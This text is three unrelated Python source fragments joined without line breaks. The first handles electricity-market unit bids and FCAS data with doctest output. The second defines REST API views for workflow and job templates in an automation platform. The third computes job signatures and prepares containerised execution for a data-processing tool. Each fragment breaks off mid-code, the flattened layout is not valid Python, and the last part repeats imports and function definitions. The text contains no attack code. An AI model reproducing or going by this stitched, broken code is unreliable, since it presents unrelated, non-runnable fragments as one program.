fast_start_profile['time_after_mode_two'] = np.where((fast_start_profile['current_mode'] == 2) & (fast_start_profile['end_mode'] == 3), fast_start_profile['time_in_end_mode'], np.NAN) for i in range(1, 10): fast_start_profile['previous_mode'] = fast_start_profile['end_mode'] fast_start_profile['current_mode_length'] = fast_start_profile.apply(lambda x: clac_mode_length(x), axis=1) fast_start_profile['end_mode'] = np.where(fast_start_profile['time_in_end_mode'] > fast_start_profile['current_mode_length'], fast_start_profile['previous_mode'] + 1, fast_start_profile['previous_mode']) fast_start_profile['time_in_end_mode'] = np.where(fast_start_profile['end_mode'] != fast_start_profile['previous_mode'], fast_start_profile['time_in_end_mode'] - fast_start_profile['current_mode_length'], fast_start_profile['time_in_end_mode']) fast_start_profile['time_after_mode_two'] = np.where((fast_start_profile['current_mode'] == 2) & (fast_start_profile['end_mode'] == 3), fast_start_profile['time_in_end_mode'], fast_start_profile['time_after_mode_two']) fast_start_profile['mode_two_length'] = fast_start_profile['mode_two_length'].astype(np.float64) fast_start_profile['mode_four_length'] = fast_start_profile['mode_four_length'].astype(np.float64) fast_start_profile['min_loading'] = fast_start_profile['min_loading'].astype(np.float64) return fast_start_profile.loc[:, ['unit', 'min_loading', 'current_mode', 'end_mode', 'time_in_current_mode', 'time_in_end_mode', 'mode_one_length', 'mode_two_length', 'mode_three_length', 'mode_four_length', 'time_after_mode_two']] def get_unit_info(self): """Get unit information. Examples -------- >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) >>> unit_data.get_unit_info() unit region dispatch_type loss_factor 0 AGLHAL SA1 generator 0.971500 1 AGLNOW1 NSW1 generator 1.003700 2 AGLSITA1 NSW1 generator 1.002400 3 AGLSOM VIC1 generator 0.984743 4 ANGAST1 SA1 generator 1.005674 .. ... ... ... ... 477 YWNL1 VIC1 generator 0.957300 478 YWPS1 VIC1 generator 0.969600 479 YWPS2 VIC1 generator 0.957300 480 YWPS3 VIC1 generator 0.957300 481 YWPS4 VIC1 generator 0.957300 <BLANKLINE> [482 rows x 4 columns] Returns ------- pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) region the market region in which the unit is \n located, (as `str`) dispatch_type whether the unit is a 'generator' or \n 'load', (as `str`) loss_factor the combined unit transmission and \n distribution loss_factor, (as np.float64) ================ ======================================== """ unit_details = self.unit_details unit_details['LOSSFACTOR'] = unit_details['TRANSMISSIONLOSSFACTOR'] * unit_details['DISTRIBUTIONLOSSFACTOR'] unit_details = unit_details.loc[:, ['DUID', 'DISPATCHTYPE', 'CONNECTIONPOINTID', 'REGIONID', 'LOSSFACTOR']] unit_details = an.map_aemo_column_names_to_nempy_names(unit_details) unit_details = an.map_aemo_column_values_to_nempy_name(unit_details, column='dispatch_type') return unit_details.loc[:, ['unit', 'region', 'dispatch_type', 'loss_factor']] def _get_unit_availability(self): bid_availability = self.get_unit_bid_availability() ugif_availability = self.get_unit_uigf_limits() return pd.concat([bid_availability, ugif_availability]) def get_processed_bids(self): """Get processed unit bids. The bids are processed by scaling for AGC enablement limits, scaling for scada ramp rates, scaling for the unconstrained intermittent generation forecast and enforcing the preconditions for enabling FCAS bids. For more info on these processes :download:`see AEMO docs <../../docs/pdfs/FCAS Model in NEMDE.pdf>`. Examples -------- >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) >>> volume_bids, price_bids = unit_data.get_processed_bids() >>> volume_bids unit service 1 2 3 4 5 6 7 8 9 10 0 AGLHAL energy 0.0 0.0 0.0 0.0 0.0 0.0 60.0 0.0 0.0 160.0 1 AGLSOM energy 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 170.0 2 ANGAST1 energy 0.0 0.0 0.0 0.0 0.0 50.0 0.0 0.0 0.0 50.0 9 ARWF1 energy 0.0 241.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 23 BALBG1 energy 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 30.0 .. ... ... ... ... ... ... ... ... ... ... ... ... 364 YWPS4 raise_6s 0.0 0.0 0.0 10.0 5.0 0.0 0.0 0.0 0.0 10.0 365 YWPS4 lower_reg 0.0 0.0 0.0 0.0 0.0 0.0 0.0 20.0 0.0 0.0 366 YWPS4 raise_reg 0.0 0.0 0.0 0.0 0.0 0.0 5.0 10.0 0.0 5.0 369 SWAN_E lower_reg 0.0 0.0 0.0 0.0 0.0 0.0 5.0 0.0 0.0 52.0 370 SWAN_E raise_reg 0.0 0.0 0.0 5.0 0.0 0.0 3.0 0.0 0.0 49.0 <BLANKLINE> [591 rows x 12 columns] >>> price_bids unit service 1 2 3 4 5 6 7 8 9 10 0 AGLHAL energy -971.50000 0.000000 270.863915 358.298915 406.873915 484.593915 562.313915 1326.641540 10277.372205 13600.018785 1 AGLSOM energy -984.74292 0.000000 83.703148 108.321721 142.787723 279.666989 444.119057 985.727663 13097.937562 14278.732950 2 ANGAST1 energy -1005.67390 0.000000 125.709237 201.335915 300.887574 382.135969 593.337544 1382.650761 10678.245470 14582.271550 3 ARWF1 energy -969.10000 -63.001191 1.996346 4.002383 8.004766 15.999841 31.999682 63.999364 127.998728 14051.950000 4 BALBG1 energy -994.80000 0.000000 19.915896 47.372376 75.177036 109.447896 298.440000 443.133660 10047.489948 14424.600000 .. ... ... ... ... ... ... ... ... ... ... ... ... 586 ASQENC1 raise_6s 0.03000 0.300000 0.730000 0.990000 1.980000 5.000000 9.900000 17.700000 100.000000 10000.000000 587 ASTHYD1 raise_6s 0.00000 0.490000 1.450000 4.950000 9.950000 15.000000 60.000000 200.000000 1000.000000 14000.000000 588 VENUS1 raise_5min 0.00000 1.000000 2.780000 3.980000 4.980000 8.600000 9.300000 14.600000 20.000000 1000.000000 589 VENUS1 raise_60s 0.00000 1.000000 2.780000 3.980000 4.980000 8.600000 9.300000 14.600000 20.000000 1000.000000 590 VENUS1 raise_6s 0.01000 0.600000 2.780000 3.980000 4.980000 8.600000 9.300000 14.000000 20.000000 1000.000000 <BLANKLINE> [591 rows x 12 columns] Multiple Returns ---------------- volume_bids : pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) service the service the bid applies to, (as `str`) 1 the volume bid the first bid band, in MW, \n (as `np.float64`) : 10 the volume in the tenth bid band, in MW, \n (as `np.float64`) ================ ======================================== price_bids : pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) service the service the bid applies to, (as `str`) 1 the price of the first bid band, in MW, \n (as `np.float64`) : 10 the price of the the tenth bid band, in MW, \n (as `np.float64`) ================ ======================================== """ uigf_values = self.raw_input_loader.get_UIGF_values() BIDPEROFFER_D = self.volume_bids.drop(['RAMPDOWNRATE', 'RAMPUPRATE'], axis=1) initial_conditions = self.initial_conditions BIDDAYOFFER_D = self.price_bids unit_info = self.get_unit_info() unit_availability = self._get_unit_availability() agc_enablement_limits = self.raw_input_loader.get_agc_enablement_limits() BIDPEROFFER_D = _scaling_for_agc_enablement_limits(BIDPEROFFER_D, agc_enablement_limits) BIDPEROFFER_D = _scaling_for_agc_ramp_rates(BIDPEROFFER_D, initial_conditions) BIDPEROFFER_D = _scaling_for_uigf(BIDPEROFFER_D, uigf_values) self.BIDPEROFFER_D, BIDDAYOFFER_D = _enforce_preconditions_for_enabling_fcas( BIDPEROFFER_D, BIDDAYOFFER_D, initial_conditions, unit_availability) volume_bids = _format_volume_bids(self.BIDPEROFFER_D, self.service_name_mapping) price_bids = _format_price_bids(BIDDAYOFFER_D, self.service_name_mapping) volume_bids = volume_bids[volume_bids['unit'].isin(list(unit_info['unit']))] volume_bids = volume_bids.loc[:, ['unit', 'service', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10']] price_bids = price_bids[price_bids['unit'].isin(list(unit_info['unit']))] price_bids = price_bids.loc[:, ['unit', 'service', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10']] # Price bids coming from xml have already been scaled by loss factors, so we need to undo this. price_bids = self._unscale_price_bids(price_bids, unit_info) return volume_bids, price_bids @staticmethod def _unscale_price_bids(price_bids, unit_info): price_bids = pd.merge(price_bids, unit_info.loc[:, ['unit', 'loss_factor']], on='unit') for col in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']: price_bids[col] = np.where(price_bids['service'] == 'energy', price_bids[col] * price_bids['loss_factor'], price_bids[col]) return price_bids.drop(columns=['loss_factor']) def add_fcas_trapezium_constraints(self): """Load the fcas trapezium constraints into the UnitData class so subsequent method calls can access them. Examples -------- >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) If we try and call add_fcas_trapezium_constraints before calling get_processed_bids we get an error. >>> unit_data.add_fcas_trapezium_constraints() Traceback (most recent call last): ... nempy.historical_inputs.units.MethodCallOrderError: Call get_processed_bids before add_fcas_trapezium_constraints. After calling get_processed_bids it goes away. >>> volume_bids, price_bids = unit_data.get_processed_bids() >>> unit_data.add_fcas_trapezium_constraints() If we try and access the trapezium constraints before calling this method we get an error. >>> inputs_loader = _test_setup() >>> unit_data = UnitData(inputs_loader) >>> unit_data.get_fcas_max_availability() Traceback (most recent call last): ... nempy.historical_inputs.units.MethodCallOrderError: Call add_fcas_trapezium_constraints before
if created: return None if parent.id == sub.id: return {"Error": _("Cycle detected.")} ''' Look for parent->child connection in all relationships except the relationship that is attempting to be added; because it's ok to re-add the relationship ''' relationships = ['success_nodes', 'failure_nodes', 'always_nodes'] relationships.remove(self.relationship) qs = functools.reduce(lambda x, y: (x | y), (Q(**{'{}__in'.format(r): [sub.id]}) for r in relationships)) if models.WorkflowJobTemplateNode.objects.filter(Q(pk=parent.id) & qs).exists(): return {"Error": _("Relationship not allowed.")} parent_node_type_relationship = getattr(parent, self.relationship) parent_node_type_relationship.add(sub) graph = WorkflowDAG(parent.workflow_job_template) if graph.has_cycle(): parent_node_type_relationship.remove(sub) return {"Error": _("Cycle detected.")} parent_node_type_relationship.remove(sub) return None class WorkflowJobTemplateNodeCreateApproval(RetrieveAPIView): model = models.WorkflowJobTemplateNode serializer_class = serializers.WorkflowJobTemplateNodeCreateApprovalSerializer permission_classes = [] def post(self, request, *args, **kwargs): obj = self.get_object() serializer = self.get_serializer(instance=obj, data=request.data) if not serializer.is_valid(): return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) approval_template = obj.create_approval_template(**serializer.validated_data) data = serializers.WorkflowApprovalTemplateSerializer(approval_template, context=self.get_serializer_context()).data return Response(data, status=status.HTTP_201_CREATED) def check_permissions(self, request): if not request.user.is_authenticated: raise PermissionDenied() obj = self.get_object().workflow_job_template if request.method == 'POST': if not request.user.can_access(models.WorkflowJobTemplate, 'change', obj, request.data): self.permission_denied(request) else: if not request.user.can_access(models.WorkflowJobTemplate, 'read', obj): self.permission_denied(request) class WorkflowJobTemplateNodeSuccessNodesList(WorkflowJobTemplateNodeChildrenBaseList): relationship = 'success_nodes' class WorkflowJobTemplateNodeFailureNodesList(WorkflowJobTemplateNodeChildrenBaseList): relationship = 'failure_nodes' class WorkflowJobTemplateNodeAlwaysNodesList(WorkflowJobTemplateNodeChildrenBaseList): relationship = 'always_nodes' class WorkflowJobNodeChildrenBaseList(SubListAPIView): model = models.WorkflowJobNode serializer_class = serializers.WorkflowJobNodeListSerializer parent_model = models.WorkflowJobNode relationship = '' search_fields = ('unified_job_template__name', 'unified_job_template__description') # # Limit the set of WorkflowJobeNodes to the related nodes of specified by #'relationship' # def get_queryset(self): parent = self.get_parent_object() self.check_parent_access(parent) return getattr(parent, self.relationship).all() class WorkflowJobNodeSuccessNodesList(WorkflowJobNodeChildrenBaseList): relationship = 'success_nodes' class WorkflowJobNodeFailureNodesList(WorkflowJobNodeChildrenBaseList): relationship = 'failure_nodes' class WorkflowJobNodeAlwaysNodesList(WorkflowJobNodeChildrenBaseList): relationship = 'always_nodes' class WorkflowJobTemplateList(ListCreateAPIView): model = models.WorkflowJobTemplate serializer_class = serializers.WorkflowJobTemplateSerializer always_allow_superuser = False class WorkflowJobTemplateDetail(RelatedJobsPreventDeleteMixin, RetrieveUpdateDestroyAPIView): model = models.WorkflowJobTemplate serializer_class = serializers.WorkflowJobTemplateSerializer always_allow_superuser = False class WorkflowJobTemplateCopy(CopyAPIView): model = models.WorkflowJobTemplate copy_return_serializer_class = serializers.WorkflowJobTemplateSerializer def get(self, request, *args, **kwargs): obj = self.get_object() if not request.user.can_access(obj.__class__, 'read', obj): raise PermissionDenied() can_copy, messages = request.user.can_access_with_errors(self.model, 'copy', obj) data = OrderedDict( [ ('can_copy', can_copy), ('can_copy_without_user_input', can_copy), ('templates_unable_to_copy', [] if can_copy else ['all']), ('credentials_unable_to_copy', [] if can_copy else ['all']), ('inventories_unable_to_copy', [] if can_copy else ['all']), ] ) if messages and can_copy: data['can_copy_without_user_input'] = False data.update(messages) return Response(data) def _build_create_dict(self, obj): """Special processing of fields managed by char_prompts""" r = super(WorkflowJobTemplateCopy, self)._build_create_dict(obj) field_names = set(f.name for f in obj._meta.get_fields()) for field_name, ask_field_name in obj.get_ask_mapping().items(): if field_name in r and field_name not in field_names: r.setdefault('char_prompts', {}) r['char_prompts'][field_name] = r.pop(field_name) return r @staticmethod def deep_copy_permission_check_func(user, new_objs): for obj in new_objs: for field_name in obj._get_workflow_job_field_names(): item = getattr(obj, field_name, None) if item is None: continue elif field_name in ['inventory']: if not user.can_access(item.__class__, 'use', item): setattr(obj, field_name, None) elif field_name in ['unified_job_template']: if not user.can_access(item.__class__, 'start', item, validate_license=False): setattr(obj, field_name, None) elif field_name in ['credentials']: for cred in item.all(): if not user.can_access(cred.__class__, 'use', cred): logger.debug('Deep copy: removing {} from relationship due to permissions'.format(cred)) item.remove(cred.pk) obj.save() class WorkflowJobTemplateLabelList(JobTemplateLabelList): parent_model = models.WorkflowJobTemplate class WorkflowJobTemplateLaunch(RetrieveAPIView): model = models.WorkflowJobTemplate obj_permission_type = 'start' serializer_class = serializers.WorkflowJobLaunchSerializer always_allow_superuser = False def update_raw_data(self, data): try: obj = self.get_object() except PermissionDenied: return data extra_vars = data.pop('extra_vars', None) or {} if obj: for v in obj.variables_needed_to_start: extra_vars.setdefault(v, u'') if extra_vars: data['extra_vars'] = extra_vars modified_ask_mapping = models.WorkflowJobTemplate.get_ask_mapping() modified_ask_mapping.pop('extra_vars') for field_name, ask_field_name in obj.get_ask_mapping().items(): if not getattr(obj, ask_field_name): data.pop(field_name, None) elif field_name == 'inventory': data[field_name] = getattrd(obj, "%s.%s" % (field_name, 'id'), None) else: data[field_name] = getattr(obj, field_name) return data def post(self, request, *args, **kwargs): obj = self.get_object() if 'inventory_id' in request.data: request.data['inventory'] = request.data['inventory_id'] serializer = self.serializer_class(instance=obj, data=request.data) if not serializer.is_valid(): return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) if not request.user.can_access(models.JobLaunchConfig, 'add', serializer.validated_data, template=obj): raise PermissionDenied() new_job = obj.create_unified_job(**serializer.validated_data) new_job.signal_start() data = OrderedDict() data['workflow_job'] = new_job.id data['ignored_fields'] = serializer._ignored_fields data.update(serializers.WorkflowJobSerializer(new_job, context=self.get_serializer_context()).to_representation(new_job)) headers = {'Location': new_job.get_absolute_url(request)} return Response(data, status=status.HTTP_201_CREATED, headers=headers) class WorkflowJobRelaunch(GenericAPIView): model = models.WorkflowJob obj_permission_type = 'start' serializer_class = serializers.EmptySerializer def check_object_permissions(self, request, obj): if request.method == 'POST' and obj: relaunch_perm, messages = request.user.can_access_with_errors(self.model, 'start', obj) if not relaunch_perm and 'workflow_job_template' in messages: self.permission_denied(request, message=messages['workflow_job_template']) return super(WorkflowJobRelaunch, self).check_object_permissions(request, obj) def get(self, request, *args, **kwargs): return Response({}) def post(self, request, *args, **kwargs): obj = self.get_object() if obj.is_sliced_job: jt = obj.job_template if not jt: raise ParseError(_('Cannot relaunch slice workflow job orphaned from job template.')) elif not obj.inventory or min(obj.inventory.hosts.count(), jt.job_slice_count) != obj.workflow_nodes.count(): raise ParseError(_('Cannot relaunch sliced workflow job after slice count has changed.')) new_workflow_job = obj.create_relaunch_workflow_job() new_workflow_job.signal_start() data = serializers.WorkflowJobSerializer(new_workflow_job, context=self.get_serializer_context()).data headers = {'Location': new_workflow_job.get_absolute_url(request=request)} return Response(data, status=status.HTTP_201_CREATED, headers=headers) class WorkflowJobTemplateWorkflowNodesList(SubListCreateAPIView): model = models.WorkflowJobTemplateNode serializer_class = serializers.WorkflowJobTemplateNodeSerializer parent_model = models.WorkflowJobTemplate relationship = 'workflow_job_template_nodes' parent_key = 'workflow_job_template' search_fields = ('unified_job_template__name', 'unified_job_template__description') def get_queryset(self): return super(WorkflowJobTemplateWorkflowNodesList, self).get_queryset().order_by('id') class WorkflowJobTemplateJobsList(SubListAPIView): model = models.WorkflowJob serializer_class = serializers.WorkflowJobListSerializer parent_model = models.WorkflowJobTemplate relationship = 'workflow_jobs' parent_key = 'workflow_job_template' class WorkflowJobTemplateSchedulesList(SubListCreateAPIView): name = _("Workflow Job Template Schedules") model = models.Schedule serializer_class = serializers.ScheduleSerializer parent_model = models.WorkflowJobTemplate relationship = 'schedules' parent_key = 'unified_job_template' class WorkflowJobTemplateNotificationTemplatesAnyList(SubListCreateAttachDetachAPIView): model = models.NotificationTemplate serializer_class = serializers.NotificationTemplateSerializer parent_model = models.WorkflowJobTemplate class WorkflowJobTemplateNotificationTemplatesStartedList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_started' class WorkflowJobTemplateNotificationTemplatesErrorList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_error' class WorkflowJobTemplateNotificationTemplatesSuccessList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_success' class WorkflowJobTemplateNotificationTemplatesApprovalList(WorkflowJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_approvals' class WorkflowJobTemplateAccessList(ResourceAccessList): model = models.User # needs to be User for AccessLists's parent_model = models.WorkflowJobTemplate class WorkflowJobTemplateObjectRolesList(SubListAPIView): model = models.Role serializer_class = serializers.RoleSerializer parent_model = models.WorkflowJobTemplate search_fields = ('role_field', 'content_type__model') def get_queryset(self): po = self.get_parent_object() content_type = ContentType.objects.get_for_model(self.parent_model) return models.Role.objects.filter(content_type=content_type, object_id=po.pk) class WorkflowJobTemplateActivityStreamList(SubListAPIView): model = models.ActivityStream serializer_class = serializers.ActivityStreamSerializer parent_model = models.WorkflowJobTemplate relationship = 'activitystream_set' search_fields = ('changes',) def get_queryset(self): parent = self.get_parent_object() self.check_parent_access(parent) qs = self.request.user.get_queryset(self.model) return qs.filter(Q(workflow_job_template=parent) | Q(workflow_job_template_node__workflow_job_template=parent)).distinct() class WorkflowJobList(ListAPIView): model = models.WorkflowJob serializer_class = serializers.WorkflowJobListSerializer class WorkflowJobDetail(UnifiedJobDeletionMixin, RetrieveDestroyAPIView): model = models.WorkflowJob serializer_class = serializers.WorkflowJobSerializer class WorkflowJobWorkflowNodesList(SubListAPIView): model = models.WorkflowJobNode serializer_class = serializers.WorkflowJobNodeListSerializer always_allow_superuser = True parent_model = models.WorkflowJob relationship = 'workflow_job_nodes' parent_key = 'workflow_job' search_fields = ('unified_job_template__name', 'unified_job_template__description') def get_queryset(self): return super(WorkflowJobWorkflowNodesList, self).get_queryset().order_by('id') class WorkflowJobCancel(RetrieveAPIView): model = models.WorkflowJob obj_permission_type = 'cancel' serializer_class = serializers.WorkflowJobCancelSerializer def post(self, request, *args, **kwargs): obj = self.get_object() if obj.can_cancel: obj.cancel() schedule_task_manager() return Response(status=status.HTTP_202_ACCEPTED) else: return self.http_method_not_allowed(request, *args, **kwargs) class WorkflowJobNotificationsList(SubListAPIView): model = models.Notification serializer_class = serializers.NotificationSerializer parent_model = models.WorkflowJob relationship = 'notifications' search_fields = ('subject', 'notification_type', 'body') def get_sublist_queryset(self, parent): return self.model.objects.filter( Q(unifiedjob_notifications=parent) | Q(unifiedjob_notifications__unified_job_node__workflow_job=parent, unifiedjob_notifications__workflowapproval__isnull=False) ).distinct() class WorkflowJobActivityStreamList(SubListAPIView): model = models.ActivityStream serializer_class = serializers.ActivityStreamSerializer parent_model = models.WorkflowJob relationship = 'activitystream_set' search_fields = ('changes',) class SystemJobTemplateList(ListAPIView): model = models.SystemJobTemplate serializer_class = serializers.SystemJobTemplateSerializer def get(self, request, *args, **kwargs): if not request.user.is_superuser and not request.user.is_system_auditor: raise PermissionDenied(_("Superuser privileges needed.")) return super(SystemJobTemplateList, self).get(request, *args, **kwargs) class SystemJobTemplateDetail(RetrieveAPIView): model = models.SystemJobTemplate serializer_class = serializers.SystemJobTemplateSerializer class SystemJobTemplateLaunch(GenericAPIView): model = models.SystemJobTemplate obj_permission_type = 'start' serializer_class = serializers.EmptySerializer def get(self, request, *args, **kwargs): return Response({}) def post(self, request, *args, **kwargs): obj = self.get_object() new_job = obj.create_unified_job(extra_vars=request.data.get('extra_vars', {})) new_job.signal_start() data = OrderedDict() data['system_job'] = new_job.id data.update(serializers.SystemJobSerializer(new_job, context=self.get_serializer_context()).to_representation(new_job)) headers = {'Location': new_job.get_absolute_url(request)} return Response(data, status=status.HTTP_201_CREATED, headers=headers) class SystemJobTemplateSchedulesList(SubListCreateAPIView): name = _("System Job Template Schedules") model = models.Schedule serializer_class = serializers.ScheduleSerializer parent_model = models.SystemJobTemplate relationship = 'schedules' parent_key = 'unified_job_template' class SystemJobTemplateJobsList(SubListAPIView): model = models.SystemJob serializer_class = serializers.SystemJobListSerializer parent_model = models.SystemJobTemplate relationship = 'jobs' parent_key = 'system_job_template' class SystemJobTemplateNotificationTemplatesAnyList(SubListCreateAttachDetachAPIView): model = models.NotificationTemplate serializer_class = serializers.NotificationTemplateSerializer parent_model = models.SystemJobTemplate class SystemJobTemplateNotificationTemplatesStartedList(SystemJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_started' class SystemJobTemplateNotificationTemplatesErrorList(SystemJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_error' class SystemJobTemplateNotificationTemplatesSuccessList(SystemJobTemplateNotificationTemplatesAnyList): relationship = 'notification_templates_success' class JobList(ListAPIView): model = models.Job serializer_class = serializers.JobListSerializer class JobDetail(UnifiedJobDeletionMixin, RetrieveDestroyAPIView): model = models.Job serializer_class = serializers.JobDetailSerializer def update(self, request, *args, **kwargs): obj = self.get_object() # Only allow changes (PUT/PATCH) when job status is "new". if obj.status != 'new': return self.http_method_not_allowed(request, *args, **kwargs) return super(JobDetail, self).update(request, *args, **kwargs) class JobCredentialsList(SubListAPIView): model = models.Credential serializer_class = serializers.CredentialSerializer parent_model = models.Job relationship = 'credentials' class JobLabelList(SubListAPIView): model = models.Label serializer_class = serializers.LabelSerializer parent_model = models.Job relationship = 'labels' parent_key = 'job' class WorkflowJobLabelList(JobLabelList): parent_model = models.WorkflowJob class JobActivityStreamList(SubListAPIView): model = models.ActivityStream serializer_class = serializers.ActivityStreamSerializer parent_model = models.Job relationship = 'activitystream_set' search_fields = ('changes',) class JobCancel(RetrieveAPIView): model = models.Job obj_permission_type = 'cancel' serializer_class = serializers.JobCancelSerializer def post(self, request, *args, **kwargs): obj = self.get_object() if obj.can_cancel: obj.cancel() return Response(status=status.HTTP_202_ACCEPTED) else: return self.http_method_not_allowed(request, *args, **kwargs) class JobRelaunch(RetrieveAPIView): model = models.Job obj_permission_type = 'start' serializer_class = serializers.JobRelaunchSerializer def update_raw_data(self, data): data = super(JobRelaunch, self).update_raw_data(data) try: obj = self.get_object() except PermissionDenied: return data if obj: needed_passwords = obj.passwords_needed_to_start if needed_passwords: data['credential_passwords'] = {} for p in needed_passwords: data['credential_passwords'][p] = u'' else: data.pop('credential_passwords', None) return data @transaction.non_atomic_requests def dispatch(self, *args, **kwargs): return super(JobRelaunch, self).dispatch(*args, **kwargs) def check_object_permissions(self, request, obj): if request.method == 'POST' and obj: relaunch_perm, messages = request.user.can_access_with_errors(self.model, 'start', obj) if not relaunch_perm and 'detail' in messages: self.permission_denied(request, message=messages['detail']) return super(JobRelaunch,
import types import types import hashlib import json import os import shutil import tempfile import subprocess from cairio import client as ca import inspect from subprocess import Popen, PIPE import shlex import time import sys import multiprocessing import random import fnmatch def sha1(str): hash_object = hashlib.sha1(str.encode('utf-8')) return hash_object.hexdigest() def compute_job_input_signature(val, input_name, *, directory): if type(val) == str: if val.startswith('sha1://'): if directory: raise Exception('sha1:// path not allowed for directory input') list = str.split(val, '/') return list[2] elif val.startswith('kbucket://'): if directory: hash0 = ca.computeDirHash(val) if not hash0: raise Exception( 'Unable to compute directory hash for input: {}'.format(input_name)) return hash0 else: sha1 = ca.computeFileSha1(val) if not sha1: raise Exception( 'Unable to compute file sha-1 for input: {}'.format(input_name)) return sha1 else: if os.path.exists(val): if directory: if os.path.isdir(val): hash0 = ca.computeDirHash(val) if not hash0: raise Exception( 'Unable to compute hash for directory input: {} ({})'.format(input_name, val)) return hash0 else: raise Exception( 'Input is not a directory: {}'.format(input_name)) else: if os.path.isfile(val): sha1 = ca.computeFileSha1(val) if not sha1: raise Exception( 'Unable to compute sha-1 of input: {} ({})'.format(input_name, val)) return sha1 else: raise Exception( 'Input is not a file: {}'.format(input_name)) else: raise Exception('Input file does not exist: '+val) else: if hasattr(val, 'signature'): return getattr(val, 'signature') else: raise Exception( "Unable to compute signature for input: {}".format(input_name)) def get_file_extension(fname): if type(fname) == str: name, ext = os.path.splitext(fname) return ext else: return '' def compute_processor_job_stats_signature(self): return compute_processor_job_output_signature(self, '--stats--') def compute_processor_job_console_out_signature(self): return compute_processor_job_output_signature(self, '--console-out--') def compute_processor_job_output_signature(self, output_name): processor_inputs = [] job_inputs = [] for input0 in self.INPUTS: name0 = input0.name val0 = getattr(self, name0) processor_inputs.append(dict( name=name0 )) job_inputs.append(dict( name=name0, signature=compute_job_input_signature( val0, input_name=name0, directory=input0.directory), ext=get_file_extension(val0) )) processor_outputs = [] job_outputs = [] for output0 in self.OUTPUTS: name0 = output0.name processor_outputs.append(dict( name=name0 )) val0 = getattr(self, name0) if type(val0) == str: job_outputs.append(dict( name=name0, ext=get_file_extension(val0) )) else: job_outputs.append(dict( name=name0, ext=val0['ext'] )) processor_parameters = [] job_parameters = [] for param0 in self.PARAMETERS: name0 = param0.name processor_parameters.append(dict( name=name0 )) job_parameters.append(dict( name=name0, value=getattr(self, name0) )) processor_obj = dict( processor_name=self.NAME, processor_version=self.VERSION, inputs=processor_inputs, outputs=processor_outputs, parameters=processor_parameters ) signature_obj = dict( processor=processor_obj, inputs=job_inputs, outputs=job_outputs, parameters=job_parameters ) if output_name: signature_obj["output_name"] = output_name signature_string = json.dumps(signature_obj, sort_keys=True) return sha1(signature_string) def create_temporary_file(fname): tempdir = os.environ.get('KBUCKET_CACHE_DIR', tempfile.gettempdir()) tmp = tempdir+'/mlprocessors' if not os.path.exists(tmp): os.mkdir(tmp) return tmp+'/'+fname class ProcessorExecuteOutput(): def __init__(self): self.outputs = dict() self.stats = dict() self.console_out = '' def _read_python_code_of_directory(dirname, additional_files=[], exclude_init=True): patterns = ['*.py']+additional_files files = [] dirs = [] for fname in os.listdir(dirname): if os.path.isfile(dirname+'/'+fname): matches = False for pattern in patterns: if fnmatch.fnmatch(fname, pattern): matches = True if exclude_init and (fname == '__init__.py'): matches = False if matches: with open(dirname+'/'+fname) as f: txt = f.read() files.append(dict( name=fname, content=txt )) elif os.path.isdir(dirname+'/'+fname): if (not fname.startswith('__')) and (not fname.startswith('.')): content = _read_python_code_of_directory( dirname+'/'+fname, additional_files=additional_files, exclude_init=False) if len(content['files'])+len(content['dirs']) > 0: dirs.append(dict( name=fname, content=content )) return dict( files=files, dirs=dirs ) def _write_python_code_to_directory(dirname, code): if os.path.exists(dirname): raise Exception( 'Cannot write code to already existing directory: {}'.format(dirname)) os.mkdir(dirname) for item in code['files']: fname0 = dirname+'/'+item['name'] with open(fname0, 'w') as f: f.write(item['content']) for item in code['dirs']: _write_python_code_to_directory( dirname+'/'+item['name'], item['content']) def _read_text_file(fname): with open(fname) as f: return f.read() def _write_text_file(fname, str): with open(fname, 'w') as f: f.write(str) def _read_text_file(fname): with open(fname) as f: return f.read() def _write_text_file(fname, str): with open(fname, 'w') as f: f.write(str) def _get_expanded_args(args): expanded_args_list = [] for key in args: val = args[key] if type(val) == str: val = "'{}'".format(val) elif type(val) == dict: val = "{}".format(json.dumps(val)) expanded_args_list.append('{}={}'.format(key, val)) expanded_args = ', '.join(expanded_args_list) return expanded_args def _execute_helper(proc, X, *, container, tempdir, _system_call_prefix, **kwargs): # Note: if container is '', then we are just executing on the host machine singularity_opts = [] if container: kbucket_cache_dir = ca.localCacheDir() singularity_opts.append( '-B {}:{}'.format(kbucket_cache_dir, '/sha1-cache')) singularity_opts.append('-B /tmp:/tmp') for input0 in proc.INPUTS: name0 = input0.name fname0 = getattr(X, name0) if fname0: if fname0.startswith('kbucket://') or fname0.startswith('sha1://'): pass else: fname0 = os.path.abspath(fname0) if container: fname2 = '/execute_in_container/input_{}'.format(name0) singularity_opts.append('-B {}:{}'.format(fname0, fname2)) else: fname2 = fname0 kwargs[name0] = fname2 for output0 in proc.OUTPUTS: name0 = output0.name val = getattr(X, name0) if val: val = os.path.abspath(val) dirname = os.path.dirname(val) filename = os.path.basename(val) dirname2 = '/execute_in_container/outputdir_{}'.format(name0) if container: kwargs[name0] = dirname2+'/'+filename singularity_opts.append('-B {}:{}'.format(dirname, dirname2)) else: kwargs[name0] = val expanded_kwargs = _get_expanded_args(kwargs) processor_source_fname = inspect.getsourcefile(proc) processor_source_dirname = os.path.dirname(processor_source_fname) # Note: in future, we do not want to mount mountaintools! This was a temp hack because I did not have wi-fi access mountaintools_source_dirname = os.path.abspath( os.path.dirname(os.path.realpath(__file__))+'/..') if not 